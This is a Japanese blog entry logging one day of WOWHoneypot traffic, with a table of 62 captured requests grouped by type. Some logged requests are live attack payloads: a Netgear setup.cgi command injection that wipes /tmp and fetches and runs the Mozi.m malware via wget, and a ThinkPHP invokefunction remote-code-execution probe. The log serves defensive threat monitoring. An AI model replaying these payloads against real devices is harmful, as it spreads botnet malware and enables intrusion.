23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(343日目)

2020/02/24(月)

トータルは62件でした。

ハンティングログは以下です。

113.134.156[.]216 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m
27.155.55[.]173 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m

www.virustotal.com

件数 概要 リクエス
22 アクセス GET /
15 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
14 調査 GET /is_test
2 phpMyAdminの調査 GET /admin-scripts.asp
2 不正中継の試み CONNECT ip.ws.126.net:443
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 vtigerCRMの調査 GET /vtigercrm/vtigerservice.php
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 Tomcatの調査 GET /manager/text/list
1 FreePBXの調査 GET /a2billing/admin/Public/index.php
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php